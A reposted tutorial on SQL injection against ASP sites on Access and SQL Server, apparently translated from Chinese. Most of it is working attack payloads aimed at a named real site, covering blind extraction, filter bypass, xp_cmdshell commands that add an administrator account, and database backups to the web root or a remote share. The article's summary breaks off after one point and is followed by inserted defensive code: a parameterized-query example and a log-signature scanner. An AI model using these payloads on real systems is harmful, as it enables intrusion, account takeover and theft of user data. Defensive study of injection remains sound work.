SQL injection introduction article

xiaoxiao2021-03-06  38

If you have not tried SQL injection before, the first step is to open IE's menu: Tools => Internet Options => Advanced, and turn off "Show friendly HTTP error messages". Otherwise, whatever the server returns, IE only shows an HTTP 500 server error and no further information can be obtained.

Introductory part, Section 1: The principle of SQL injection

We begin with a website, www.19cn.com (note: this site agreed to this article long ago; most of the data is real). On the site's home page there is a link titled "IE cannot open a new window", whose address is http://www.19cn.com/showdetail.asp?id=49. If we append a single quote (') to this address, the server returns the following error:

Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression 'ID=49''.
/showdetail.asp, line 8

From this error message we can see the following:

1. The site uses an Access database and connects to it through the JET engine, not through ODBC.
2. The program does not check whether the data submitted by the client meets its requirements.
3. The SQL statement queries on a field named ID.

From the example above we can see the principle of SQL injection: the client submits specially crafted code, the program and server collect it into the query, and the result gives away the information the attacker wants.

Introductory part, Section 2: Judging whether injection is possible

After reading the previous section, some people will think: isn't testing for injection very simple, just append a single quote? In fact this is not the best way. Why? First, not every server's IIS returns the error message to the client; if the program adds a check on the parameter, SQL injection will not succeed, but the server still reports an error, and the specific message is "Error on the server when processing the URL. Please contact the system administrator." Second, some programmers who know a little about SQL injection think that filtering out the single quote makes the program safe, and this case is not rare; if you test with a single quote you cannot find the injection point. So which test method is more accurate? The answer is as follows:

1. http://www.19cn.com/showdetail.asp?id=49
2. http://www.19cn.com/showdetail.asp?id=49 and 1=1
3. http://www.19cn.com/showdetail.asp?id=49 and 1=2

This is the classic 1=1, 1=2 test method. How do we judge? Look at the results returned by the three URLs above. If injection is possible, the behaviour is:

1. Displays normally (this is inevitable; otherwise something else is wrong).
2. Displays normally, with content essentially the same as 1.
3. Prompts BOF or EOF (the program makes no check), or prompts that the record was not found (the program checks rs.eof), or the content is empty (the program added On Error Resume Next).

If injection is not possible, 1 also displays normally, while 2 and 3 generally give a program-defined error message, or a type conversion error prompt. Of course, this is only the judgment method for a numeric parameter. In practice there are also character-type and search-type parameters; I will analyze them in the intermediate part under "General steps of SQL injection".

Introductory part, Section 3: Determining the database type and the injection method

Different databases have different functions and injection methods, so we must determine the database type before injecting. The databases most often paired with ASP are Access and SQL Server; between them they cover more than 99% of the websites online. How do we make the program tell us which database it uses? Look at this: SQL Server has some system variables, and if the server's IIS error messages are not turned off and SQL Server returns its error messages, we can read the answer directly from the error message. The method is as follows:

http://www.19cn.com/showdetail.asp?id=49 and user>0

This statement is simple, but it contains the essence of the injection method unique to SQL Server; I discovered this efficient method in an unintentional test. Let us look at its meaning: the preceding part is normal, and the focus is on "and user>0". We know that user is a built-in variable of SQL Server whose value is the username of the current connection, of type nvarchar. Comparing an nvarchar value with the integer 0 makes the system try to convert the nvarchar value to int. This conversion will certainly fail, and SQL Server's error message is: "Syntax error converting the nvarchar value 'abc' to a column of data type int." Here abc is the value of the variable user, so the database username is exposed without any effort. In the following pages everyone will see many statements that use this method.

By the way, it is well known that SQL Server's user sa is a role with permissions equivalent to Administrators; obtaining sa permissions almost certainly means obtaining the host's Administrator. The above method conveniently tests whether the program logs in as sa: if it does, the error message says that converting "dbo" to int failed, not "sa".

If the server's IIS is not allowed to return error messages, how do you determine the database type? We can start from the differences between Access and SQL Server. Each has its own system tables, for example the table that stores all the objects in the database: in Access it is the system table [msysobjects], but reading this table in a web environment gives a "no permissions" error; in SQL Server it is the table [sysobjects], which can be read normally in a web environment.

Where injection is possible, use the following statements:

http://www.19cn.com/showdetail.asp?id=49 and (select count(*) from sysobjects)>0
http://www.19cn.com/showdetail.asp?id=49 and (select count(*) from msysobjects)>0

If the database is SQL Server, the page for the first URL is essentially the same as the original page http://www.19cn.com/showdetail.asp?id=49, while the second URL errors because the table msysobjects cannot be found; even if the program has error handling, the page is completely different from the original. If the database is Access, the situation is different: the page for the first URL is completely different from the original; the second depends on whether the database settings allow reading the system table, which is generally not allowed, so it is also completely different from the original. In most cases the first URL alone tells you which database the system uses; the second is only used for verification when IIS error messages are turned off.

Next, we continue to learn how to obtain the content we want from the database. First, let us look at the general steps of SQL injection.

Intermediate part, Section 1: General steps of SQL injection

First, determine the environment, find an injection point, and determine the database type; this was covered in the introductory part.

Second, according to the type of the injected parameter, reconstruct the original form of the SQL statement in your mind. By parameter type there are three cases:

(A) ID=49. This type of injected parameter is numeric, and the SQL statement is roughly: select * from tablename where field=49. The injected parameter is ID=49 and [query condition], which generates the statement: select * from tablename where field=49 and [query condition].

(B) Class=Serial. This type of injected parameter is a character string, and the SQL statement is roughly: select * from tablename where field='Serial'. The injected parameter is Class=Serial' and [query condition] and ''=', which generates the statement: select * from tablename where field='Serial' and [query condition] and ''=''.

(C) An unfiltered search parameter, such as keyword=keyword. The original SQL statement is: select * from tablename where field like '%keyword%'. The injected parameter is keyword=' and [query condition] and '%25'=', which generates the statement: select * from tablename where field like '%' and [query condition] and '%'='%'.

Next, substitute the query condition into the SQL statement to guess the table name, for example:

ID=49 and (select count(*) from admin)>=0

If the page is the same as with ID=49, the additional condition holds, that is, the table admin exists; otherwise it does not exist (please remember this method). Loop like this until you guess the table name. After guessing the table name, replace count(*) with count(fieldname) and guess the field name in the same way.

Some people will say: there is luck involved here; if the table name is very complicated there is no way to continue. That is quite right. There is no 100% successful hacker technology in this world; flies do not bite seamless eggs. However skilled a hacker is, they only get in because others were not careful or not rigorous, or because a user did not keep a secret. Back to the subject: for SQL Server databases there is a way to make the program tell us the table and field names, which we will introduce in the advanced part.

Finally, after the table name and field name are guessed successfully, use SQL statements to obtain the value of the field. The most common method is described below; although slow, it is certainly feasible. Let us take an example. Knowing that the table admin has a field username, first take the first record and test its length:

http://www.19cn.com/showdetail.asp?id=49 and (select top 1 len(username) from admin)>0

First the principle: if the length of the top 1 username is greater than 0, the condition holds; then test >1, >2, >3 and so on until the condition fails. For example, if >7 holds and >8 fails, then len(username)=8. Of course, nobody would be so stupid as to test 0, 1, 2, 3 one by one; use your own judgment on how to play it.

After obtaining the length of username, take the nth character with mid(username,n,1), then asc(mid(username,n,1)) gives its ASCII code, for example:

id=49 and (select top 1 asc(mid(username,1,1)) from admin)>0

Likewise, narrow the range step by step to get the ASCII code of the first character. Note that the ASCII codes of English letters and digits lie between 1 and 128, so a binary search can be used to speed up the guessing; if a program is written to do this, efficiency improves greatly.

Intermediate part, Section 2: Common SQL injection functions

Someone with a foundation in SQL has a much higher success rate at SQL injection than someone unfamiliar with it. We must improve our SQL level, especially on common functions and commands.

Access: asc(character)        SQL Server: unicode(character)      Effect: returns the ASCII code of the character
Access: chr(number)           SQL Server: nchar(number)           Effect: the reverse of asc, returns the character for an ASCII code
Access: mid(string,N,L)       SQL Server: substring(string,N,L)   Effect: returns the substring of length L starting at the Nth character, i.e. the characters between N and N+L
Access: abs(number)           SQL Server: abs(number)             Effect: returns the absolute value of the number (used when guessing Chinese characters)
Access: A between B and C     SQL Server: A between B and C       Effect: judges whether A lies between B and C

Intermediate part, Section 3: Handling Chinese characters

When Chinese characters turn up during injection, some people want to retreat. In fact, as long as you know Chinese encoding, the "Chinese phobia" can be overcome quickly. Some common sense first: in Access, the ASCII code of a Chinese character may be negative; take the negative value and use abs() to get the absolute value, and the Chinese character is unchanged. In SQL Server the ASCII code of a Chinese character is positive, but since it is a two-byte Unicode encoding, the code cannot be obtained with the function ascii(); the function unicode() must be used to return it, and the corresponding Chinese character is returned with the nchar function. After understanding these two points, don't you think guessing Chinese is almost the same as English? Apart from the functions used, what matters is paying attention to the range; the method is no different.

Advanced part, Section 1: Using system tables to inject a SQL Server database

SQL Server is a powerful database system with a close relationship to the operating system, which brings great convenience to developers but on the other hand also provides a springboard for injection. Let us look at several specific examples:

1. http://site/url.asp?id=1;exec master..xp_cmdshell 'net user name password /add'--

In SQL Server the semicolon separates the statements before and after it, and -- indicates that what follows is a comment, so this statement is executed in SQL Server as two: first select the record with id=1, then execute the stored procedure xp_cmdshell, which is used to call system commands; the net command then creates a new Windows account with the given name and password. Then:

2. http://site/url.asp?id=1;exec master..xp_cmdshell 'net localgroup name administrators /add'--

adds the new account to the administrators group. In less than two minutes you have already got the highest authority on the system! Of course, this method only applies when the database connection uses sa; otherwise there is no permission to call xp_cmdshell.

3. http://site/url.asp?id=1;;and db_name()>0

This is similar to the earlier example "and user>0", which obtains the connecting username; db_name() is another system variable, and it returns the name of the connected database.

4. http://site/url.asp?id=1;backup database dbname to disk='c:/inetpub/wwwroot/1.db';--

This one is quite ruthless: with the database name obtained from 3, plus the absolute path exposed by some IIS error, back up the database into the web directory and then download the whole database over HTTP; all the administrator and user passwords are laid bare! When the absolute path is unknown, you can also back up to a network address (such as //202.96.xx.xx/share/1.db), but the success rate is not high.

5. http://site/url.asp?id=1;;and (select top 1 name from sysobjects where xtype='u' and status>0)>0

As said before, sysobjects is SQL Server's system table, storing all table names, views, constraints and other objects; xtype='u' and status>0 denotes tables created by the user. The statement above takes out the first table name and compares it with 0, letting the error message expose the table name. How to get the second and third table names? I leave that to our clever readers.

6. http://site/url.asp?id=1;;and (select top 1 col_name(object_id('tablename'),1) from sysobjects)>0

After obtaining the table name from 5, use object_id('tablename') to get the table's internal ID; col_name(tableID,1) denotes the first field name of that table, and replacing 1 with 2, 3, 4 ... gets the field names of the specified table one by one.

The six points above are the hard-won crystallisation of my study of SQL Server injection; it can be seen that the degree of understanding of SQL Server directly affects the success rate and the speed of guessing. After studying SQL Server injection, my development skills also improved a lot; perhaps security and development complement each other.

Advanced part, Section 2: Bypassing program restrictions to continue injecting

The introductory part mentioned that many people like to test for injection vulnerabilities with a single quote, so many people filter out the single quote to "prevent" injection vulnerabilities. This may block some introductory-level attacks, but people more familiar with SQL can still use related functions to bypass the program's restrictions. In the "General steps of SQL injection" section, the statements I used were already optimised so that they contain no single quote; in "Using system tables to inject a SQL Server database", some statements do contain single quotes. Let us take an example and see how to transform these statements. It is simple: for example, in where xtype='u' the ASCII code of the character u is 85, so it can be replaced with where xtype=char(85); if the characters are Chinese, for example where name='用户' (the Chinese word for "user"), it can be replaced with where name=nchar(29992)+nchar(25143).

Advanced part, Section 3: Summary of experience

1. Some people filter these keywords but forget about case sensitivity, so everyone can try mixed-case variants such as SeLecT.
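To tie the general-steps section back to the code that causes it: the following is an added example written for this edit, not code from the original article or the 19cn.com site. It builds the numeric (ID=49) and character (Class=Serial) query shapes described in the "General steps of SQL injection" section both the vulnerable way and with parameter binding, and wraps the article's 1=1 / 1=2 test as a regression check a developer can run against their own lookup functions. The table, column names and rows are constructed; sqlite stands in for Access/SQL Server.

```python
import sqlite3

# Constructed in-memory stand-in for the article's content table; not the
# real site's schema. The 'cls' column plays the role of the Class parameter.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE content (id INTEGER, cls TEXT, title TEXT);
        INSERT INTO content VALUES (49, 'Serial', 'IE cannot open a new window');
        INSERT INTO content VALUES (50, 'Movie', 'Another article');
    """)
    return conn

# Vulnerable forms, one per parameter type in the article: the raw parameter
# is pasted into the statement, so a 1=1 / 1=2 probe rewrites the WHERE clause.
def unsafe_by_id(conn, param: str):
    return conn.execute(f"SELECT id FROM content WHERE id={param}").fetchall()

def unsafe_by_class(conn, param: str):
    return conn.execute(f"SELECT id FROM content WHERE cls='{param}'").fetchall()

# Hardened forms: the numeric parameter is validated before use and both
# values are bound as parameters, so client input is compared as data only.
def safe_by_id(conn, param: str):
    if not param.isdigit():
        raise ValueError("id must be a positive integer")
    return conn.execute("SELECT id FROM content WHERE id=?", (int(param),)).fetchall()

def safe_by_class(conn, param: str):
    return conn.execute("SELECT id FROM content WHERE cls=?", (param,)).fetchall()

def probe_pair_differs(fetch, base: str, true_suffix: str, false_suffix: str) -> bool:
    """Regression check in the shape of the article's test: a lookup that answers
    the 'always true' and 'always false' probes differently is injectable.
    A rejected parameter counts as one fixed answer, so it can never differ."""
    def run(p):
        try:
            return fetch(p)
        except ValueError:
            return "rejected"
    return run(base + true_suffix) != run(base + false_suffix)
```

With the bound version, the character probe "Serial' and 1=1 and ''='" is simply a class name that matches no row, so both probes return the same empty result.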
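Seen from the server side, every probe shape in this article leaves a recognisable trace in the web server log, including the char()/nchar() quote bypass and the mixed-case keyword trick from the last two sections. The following is an added example for this edit, not code from the original article: it URL-decodes the query string of constructed IIS-style log lines, tags the request shapes described above, and reports which clients sent the 1=1 / 1=2 pair against the same page, since that pair is the strong signal rather than either probe alone. Log format, hosts and timestamps are constructed.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS-style log lines: date time c-ip method uri-stem uri-query status.
SAMPLE_LOG = """\
2004-03-06 10:01:02 10.0.0.5 GET /showdetail.asp id=49 200
2004-03-06 10:01:09 10.0.0.5 GET /showdetail.asp id=49%20and%201=1 200
2004-03-06 10:01:15 10.0.0.5 GET /showdetail.asp id=49%20and%201=2 200
2004-03-06 10:02:30 10.0.0.5 GET /showdetail.asp id=49%20and%20user%3E0 500
2004-03-06 10:03:11 10.0.0.5 GET /showdetail.asp id=49%20and%20(SeLeCt%20count(*)%20from%20sysobjects)%3E0 200
2004-03-06 10:04:40 10.0.0.5 GET /url.asp id=1;exec%20master..xp_cmdshell%20'...'-- 500
2004-03-06 10:05:02 10.0.0.5 GET /url.asp id=1;;and%20(select%20top%201%20name%20from%20sysobjects%20where%20xtype=char(85))%3E0 500
2004-03-06 10:06:00 10.0.0.9 GET /showdetail.asp id=50 200
"""

# Matched against the decoded, lower-cased query, so SeLeCt-style casing and
# %20/%3E encoding do not hide the probe; char()/nchar() covers the quote bypass.
SIGNATURES = {
    "boolean-probe":   re.compile(r"\band\s+1\s*=\s*[12]\b"),
    "type-conversion": re.compile(r"\band\s+(user|db_name\(\))\s*>\s*0"),
    "system-table":    re.compile(r"\b(m?sysobjects|col_name|object_id)\b"),
    "stacked-query":   re.compile(r";\s*(exec\b|backup\s+database\b)"),
    "xp_cmdshell":     re.compile(r"xp_cmdshell"),
    "quote-bypass":    re.compile(r"\bn?char\s*\(\s*\d+\s*\)"),
}

def scan_log(text: str):
    """Return (line_no, client_ip, uri_stem, decoded_query, [signature names])
    for every request whose query string matches at least one signature."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        parts = line.split()
        if len(parts) < 7:
            continue
        ip, stem, query = parts[2], parts[4], unquote_plus(parts[5]).lower()
        tags = [name for name, rx in SIGNATURES.items() if rx.search(query)]
        if tags:
            hits.append((n, ip, stem, query, tags))
    return hits

def boolean_pairs(hits):
    """Return {(ip, stem)} that sent both the 1=1 and the 1=2 probe to one page."""
    seen = {}
    for _, ip, stem, query, tags in hits:
        if "boolean-probe" in tags:
            last_digit = SIGNATURES["boolean-probe"].search(query).group(0)[-1]
            seen.setdefault((ip, stem), set()).add(last_digit)
    return {k for k, v in seen.items() if {"1", "2"} <= v}
```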

Please credit the original address when reposting: https://www.9cbs.com/read-70176.html
